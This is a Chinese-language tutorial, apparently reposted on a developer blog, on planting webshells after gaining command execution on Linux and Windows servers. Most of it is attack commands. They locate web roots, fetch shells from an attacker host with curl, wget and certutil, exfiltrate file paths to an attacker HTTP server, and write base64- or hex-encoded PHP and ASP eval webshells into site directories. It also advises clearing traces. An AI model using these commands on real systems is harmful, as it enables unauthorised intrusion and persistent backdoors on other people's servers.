命令执行之文件落地利用总结

程序猿 • 2025年11月6日 12:19:59 • 系统教程 • 阅读 1

0x01 前言

利用各类RCE远程命令执行或MSSQL注入等漏洞获取到一个能够执行命令的权限后该如何写入Webshell？这里我们根据可能会遇到的多个场景进行了一些测试，如：Linux/Windows，出/不出网、有/无回显。

一般我们在确定能够执行命令时都会选择直接上线CS/MSF，但也会遇到那种不出网、无回显的场景，这时可能就需要找到目标网站的绝对路径先写入一个Webshell，然后再进行后续的信息搜集及内网渗透等。

注：我们可以通过在网站前/后台的上传功能随便传一个文件，然后再利用Windows的for或Linux的while等命令来查找刚上传的文件，或网站下已存在的文件得到绝对路径，最后再写入文件即可，继续往下看。

0x02 Linux

(1) 目标出网，命令有回显

如果目标主机可以出网，并且执行命令有回显，这时我们就可以直接通过执行以下命令来获取目标网站的绝对路径，然后再利用以下多种方式写入或下载Webshell。

查找绝对路径：

代码语言：javascript代码运行次数：0运行复制

locate 1653042293000.png 2>/dev/nullfind / -name 1653042293000.png 2>/dev/nullfind / | grep 1653042293000.png 2>/dev/nullfind /var/www/html/ -name "*.php" | xargs grep "某某网站"

常规方式写入：

代码语言：javascript代码运行次数：0运行复制

echo '' > /var/www/html/shell.php

远程下载写入：

代码语言：javascript代码运行次数：0运行复制

curl http://192.168.1.120/shell.txt > /var/www/html/shell.phpwget http://192.168.1.120/shell.txt -O /var/www/html/shell.php

(2) 目标出网，命令无回显

如果目标主机可以出网，但执行命令无回显，这时我们可以通过执行以下命令使用httplog方式来获取目标网站的绝对路径，然后再利用以下方式写入Webshell，需转义或有防护时可尝试编码方式写入。

查找绝对路径：

代码语言：javascript代码运行次数：0运行复制

python -m SimpleHTTPServer 8888curl http://192.168.1.120:8888/`find / | grep 1653042293000.png`wget http://192.168.1.120:8888/`find / | grep 1653042293000.png`

编码方式写入：

代码语言：javascript代码运行次数：0运行复制

echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+ | base64 -d > /var/www/html/shell.phpecho 3C3F706870206576616C28245F504F53545B315D293B3F3E | xxd -r -ps > /var/www/html/shell.php

(3) 目标不出网，命令无回显

如果目标主机不能出网，并且执行命令无回显，这时我们可以通过执行以下命令先遍历出1653042293000.png文件的绝对路径，然后再次遍历该文件绝对路径，或者将Webshell写入到该文件同级目录下。

实战应用中最好是先确定目标网站的绝对路径，然后单独写入Webshell，最好不要直接使用第二条命令，因为如果目标主机上有同名文件时则会往找到的多个绝对路径下写入文件，到时还要注意清理痕迹。

查找绝对路径写入至web目录：

代码语言：javascript代码运行次数：0运行复制

find / -name 1653042293000.png | while read f;do sh -c 'find / -name 1653042293000.png' >$(dirname $f)/path.txt;done

查找绝对路径写入Webshell：

BibiGPT-哔哔终结者

B站视频总结器-一键总结音视频内容

28 查看详情 BibiGPT-哔哔终结者代码语言：javascript代码运行次数：0运行复制

find / -name 1653042293000.png | while read f;do sh -c "echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+ | base64 -d">$(dirname $f)/shell.php;donefind / -name 1653042293000.png | while read f;do sh -c "echo 3C3F706870206576616C28245F504F53545B315D293B3F3E | xxd -r -ps">$(dirname $f)/shell.php;done

0x03 Windows

(1) 目标出网，命令有回显

如果目标主机可以出网，并且执行命令有回显，这时我们可以通过执行dir、where、for、finstr等命令，或读取IIS配置文件等方式来获取目标网站的绝对路径，然后再利用以下多种方式写入或下载Webshell。

查找绝对路径：

代码语言：javascript代码运行次数：0运行复制

dir /a/b/s C:1653042293000.pngwhere /r C:1653042293000.pngfor /r "C:" %i in (1653042293000.png*) do @echo %ifindstr /n /s /i "某某网站" C:*.asp%windir%system32inetsrvappcmd list VDIR

常规方式写入：

代码语言：javascript代码运行次数：0运行复制

set /p="" > C:inetpubwwwrootshell.aspecho ^ > C:inetpubwwwrootshell.aspcertutil -urlcache -split -f http://192.168.1.105:8080/shell.txt C:inetpubwwwrootshell.asp

(2) 目标出网，命令无回显

如果目标主机可以出网，但执行命令无回显，这时我们可以通过执行以下命令在指定的C盘中循环查找1653042293000.png文件，将找到的文件绝对路径保存在%i变量，然后执行certutil通过httplog方式来获取目标网站的绝对路径，或者直接写入Webshell，需转义或有防护时可尝试编码方式写入，需清理shell.txt。

查找绝对路径：

代码语言：javascript代码运行次数：0运行复制

python -m SimpleHTTPServer 8888for /r C: %i in (1653042293000.png*) do certutil -urlcache -split -f http://192.168.1.120:8888/%i

常规方式写入：

代码语言：javascript代码运行次数：0运行复制

for /r C: %i in (1653042293000.png*) do echo ^ > %i/../shell.asp

编码方式写入：

代码语言：javascript代码运行次数：0运行复制

for /r C: %i in (1653042293000.png*) do echo PCVleGVjdXRlIHJlcXVlc3QoIjEiKSU+ > %i/../shell.txt & certutil -decode %i/../shell.txt %i/../shell.aspfor /r C: %i in (1653042293000.png*) do echo 3C256578656375746520726571756573742822312229253E > %i/../shell.txt & certutil -decodehex %i/../shell.txt %i/../shell.asp

(3) 目标不出网，命令无回显

如果目标主机不能出网，并且执行命令无回显，这时我们可以通过执行以下命令将找到的1653042293000.png文件绝对路径，或者将Webshell写入到该文件同级目录下，需转义或有防护时可尝试编码方式写入。

两条命令虽然看起来差不多，但第一条执行效率要高一些，因为在命令执行过程中就已经写入了，第二条得在命令执行完成后才会写入，所以个人推荐使用第一种，注意清理同名文件路径下的痕迹。

查找绝对路径写入至web目录：

代码语言：javascript代码运行次数：0运行复制

for /r C: %i in (1653042293000.png*) do echo %i> %i..path.txtfor /f %i in ('dir /s /b C:1653042293000.png') do echo %i> %i..path.txtforfiles /P C: /S /M 1653042293000.png /C "cmd /c dir /a/b/s C:1653042293000.png > path.txt"

查找绝对路径写入Webshell：

代码语言：javascript代码运行次数：0运行复制

for /r C: %i in (1653042293000.png*) do echo ^ > %i/../shell.aspfor /f %i in ('dir /s /b C:1653042293000.png') do echo ^ > %i/../shell.aspforfiles /P C: /S /M 1653042293000.png /C "cmd /c echo ^ > shell.asp"

文末总结：

这篇文章我将找绝对路径方式分为3种：命令查找（有回显）、httplog外带（无回显）、写进Web目录（不出网），写文件方式也分为3种：常规写入、编码写入、远程下载。Linux、Windows利用方式都一样，只是命令不一样，都是根据文件名、文件内容找绝对路径，常见文件写入、下载方式进行Getshell。

以上就是命令执行之文件落地利用总结的详细内容，更多请关注php中文网其它相关文章！

版权声明：本文内容由互联网用户自发贡献，该文观点仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容，请发送邮件至 chuangxiangniao@163.com 举报，一经查实，本站将立刻删除。
发布者：程序猿，转转请注明出处：https://www.chuangxiangniao.com/p/383142.html

c盘 html iis java javascript linux php python win windows

打赏

微信扫一扫

支付宝扫一扫

0 0

关于作者

程序猿签约作者

414.1K 文章

0 评论

2 粉丝

这个人很懒，什么都没有留下～

win10每次开机要双击任务栏才能完成加载如何解决

上一篇 2025年11月6日 12:19:40

Win10电脑怎么打开设置？

下一篇 2025年11月6日 12:20:20

好文分享

如何解决本地图片在使用 mask JS 库时出现的跨域错误？

如何跨越localhost使用本地图片？问题: 在本地使用mask js库时，引入本地图片会报跨域错误。解决方案: 要解决此问题，需要使用本地服务器启动文件，以http或https协议访问图片，而不是使用file://协议。例如： python -m http.server 8000 然后，可以…

程序猿
2025年12月24日
2000
好文分享

CSS元素设置em和transition后，为何载入页面无放大效果？

css元素设置em和transition后，为何载入无放大效果很多开发者在设置了em和transition后，却发现元素载入页面时无放大效果。本文将解答这一问题。原问题：在视频演示中，将元素设置如下，载入页面会有放大效果。然而，在个人尝试中，并未出现该效果。这是由于macos和windows系统…

程序猿
2025年12月24日
2000
好文分享

如何模拟Windows 10 设置界面中的鼠标悬浮放大效果？

win10设置界面的鼠标移动显示周边的样式（探照灯效果）的实现方式在windows设置界面的鼠标悬浮效果中，光标周围会显示一个放大区域。在前端开发中，可以通过多种方式实现类似的效果。使用css 使用css的transform和box-shadow属性。通过将transform: scale(1.…

程序猿
2025年12月24日
2000
好文分享

如何用HTML/JS实现Windows 10设置界面鼠标移动探照灯效果？

Win10设置界面中的鼠标移动探照灯效果实现指南想要在前端开发中实现类似于Windows 10设置界面的鼠标移动探照灯效果，有两种解决方案：CSS 和 HTML/JS 组合。 CSS 实现不幸的是，仅使用CSS无法完全实现该效果。立即学习“前端免费学习笔记（深入）”； HTML/JS 实现要…

程序猿
2025年12月24日
0000
好文分享

如何用前端实现 Windows 10 设置界面的鼠标移动探照灯效果？

如何在前端实现 Windows 10 设置界面中的鼠标移动探照灯效果想要在前端开发中实现 Windows 10 设置界面中类似的鼠标移动探照灯效果，可以通过以下途径： CSS 解决方案 DEMO 1: Windows 10 网格悬停效果：https://codepen.io/tr4553r7/pe…

程序猿
2025年12月24日
0000
好文分享

如何用前端技术实现Windows 10 设置界面鼠标移动时的探照灯效果？

探索在前端中实现 Windows 10 设置界面鼠标移动时的探照灯效果在前端开发中，鼠标悬停在元素上时需要呈现类似于 Windows 10 设置界面所展示的探照灯效果，这其中涉及到了元素外围显示光圈效果的技术实现。 CSS 实现虽然 CSS 无法直接实现探照灯效果，但可以通过以下技巧营造出类似效…

程序猿
2025年12月24日
0000
好文分享

使用 Mask 导入本地图片时，如何解决跨域问题？

跨域疑难：如何解决 mask 引入本地图片产生的跨域问题？在使用 mask 导入本地图片时，你可能会遇到令人沮丧的跨域错误。为什么会出现跨域问题呢？让我们深入了解一下： mask 框架假设你以 http(s) 协议加载你的 html 文件，而当使用 file:// 协议打开本地文件时，就会产生跨域…

程序猿
2025年12月24日
2000
好文分享

苹果浏览器网页背景图色差问题：如何解决背景图不一致？

网页背景图在苹果浏览器上出现色差一位用户在使用苹果浏览器访问网页时遇到一个问题，网页上方的背景图比底部的背景图明显更亮。这个问题的原因很可能是背景图没有正确配置 background-size 属性。在 windows 浏览器中，背景图可能可以自动填满整个容器，但在苹果浏览器中可能需要显式设置 …

程序猿
2025年12月24日
4000
好文分享

苹果浏览器网页背景图像为何色差？

网页背景图像在苹果浏览器的色差问题在不同浏览器中，网站的背景图像有时会出现色差。例如，在 Windows 浏览器中显示正常的上层背景图，在苹果浏览器中却比下层背景图更亮。问题原因出现此问题的原因可能是背景图像未正确设置 background-size 属性。解决方案为确保背景图像在不同浏览…

程序猿
2025年12月24日
5000
好文分享

苹果电脑浏览器背景图亮度差异：为什么网页上下部背景图色差明显？

背景图在苹果电脑浏览器上亮度差异问题描述：在网页设计中，希望上部元素的背景图与页面底部的背景图完全对齐。而在 Windows 中使用浏览器时，该效果可以正常实现。然而，在苹果电脑的浏览器中却出现了明显的色差。原因分析：如果您已经排除屏幕分辨率差异的可能性，那么很可能是背景图的 backgro…

程序猿
2025年12月24日
0000
好文分享

正则表达式在文本验证中的常见问题有哪些？

正则表达式助力文本输入验证在文本输入框的验证中，经常遇到需要限定输入内容的情况。例如，输入框只能输入整数，第一位可以为负号。对于不会使用正则表达式的人来说，这可能是个难题。下面我们将提供三种正则表达式，分别满足不同的验证要求。 1. 可选负号，任意数量数字如果输入框中允许第一位为负号，后面可输入…

程序猿
2025年12月24日
0000
好文分享

如何在 VS Code 中解决折叠代码复制问题？

解决 VS Code 折叠代码复制问题在 VS Code 中使用折叠功能可以帮助组织长代码，但使用复制功能时，可能会遇到只复制可见部分的问题。以下是如何解决此问题：当代码被折叠时，可以使用以下简单操作复制整个折叠代码：按下 Ctrl + C (Windows/Linux) 或 Cmd + C …

程序猿
2025年12月24日
0000
使用 Bootstrap 创建响应式布局

平安在本文中，我将引导您完成使用 bootstrap 5 构建简单且响应式布局的过程。这是我将向您介绍的 html 结构： become a web developer lorem ipsum dolor sit amet consectetur adipisicing elit. earum d…

程序猿
2025年12月24日 • 好文分享
0000
好文分享

为什么多年的经验让我选择全栈而不是平均栈

在全栈和平均栈开发方面工作了 6 年多，我可以告诉您，虽然这两种方法都是流行且有效的方法，但它们满足不同的需求，并且有自己的优点和缺点。这两个堆栈都可以帮助您创建 Web 应用程序，但它们的实现方式却截然不同。如果您在两者之间难以选择，我希望我在两者之间的经验能给您一些有用的见解。在这篇文章中，我…

程序猿
2025年12月24日
0000
好文分享

姜戈顺风

本教程演示如何在新项目中从头开始配置 django 和 tailwindcss。 django 设置创建一个名为 .venv 的新虚拟环境。 # windows$ python -m venv .venv$ .venvscriptsactivate.ps1(.venv) $# macos/linu…

程序猿
2025年12月24日
0000
好文分享

花 $o 学习这些编程语言或免费

→ Python → JavaScript → Java → C# → 红宝石 → 斯威夫特 → 科特林 → C++ → PHP → 出发 → R → 打字稿 []https://x.com/e_opore/status/1811567830594388315?t=_j4nncuiy2wfbm7ic…

程序猿
2025年12月24日
0000
好文分享

学会从头开始学习CSS，掌握制作基本网页框架的技巧

从零开始学习CSS，掌握网页基本框架制作技巧前言：在现今互联网时代，网页设计和开发是一个非常重要的技能。而学习CSS（层叠样式表）是掌握网页设计的关键之一。CSS不仅可以为网页添加样式和布局，还可以为用户呈现独特且具有吸引力的页面效果。在本文中，我将为您介绍一些基本的CSS知识，以及一些常用的代…

程序猿
2025年12月24日
2000
好文分享

揭秘Web标准涵盖的语言：了解网页开发必备的语言范围

在当今数字时代，互联网成为了人们生活中不可或缺的一部分。作为互联网的基本构成单位，网页承载着我们获取和分享信息的重要任务。而网页开发作为一门独特的技术，离不开一些必备的语言。本文将揭秘Web标准涵盖的语言，让我们一起了解网页开发所需的语言范围。首先，HTML（HyperText Markup La…

程序猿
2025年12月24日
0000
好文分享

揭开Web开发的语言之谜：了解构建网页所需的语言有哪些？

Web标准中的语言大揭秘：掌握网页开发所需的语言有哪些？随着互联网的快速发展，网页开发已经成为人们重要的职业之一。而要成为一名优秀的网页开发者，掌握网页开发所需的语言是必不可少的。本文将为大家揭示Web标准中的语言大揭秘，介绍网页开发所需的主要语言。 HTML（超文本标记语言）HTML是网页开发的…

程序猿
2025年12月24日
4000
好文分享

常用的网页开发语言：了解Web标准的要点

了解Web标准的语言要点：常见的哪些语言应用在网页开发中？随着互联网的不断发展，网页已经成为人们获取信息和交流的重要途径。而要实现一个高质量、易用的网页，离不开一种被广泛接受的Web标准。Web标准的制定和应用，涉及到多种语言和技术，本文将介绍常见的几种语言在网页开发中的应用。首先，HTML（H…

程序猿
2025年12月24日
0000

发表回复

登录后才能评论

命令执行之文件落地利用总结

关于作者

相关推荐

发表回复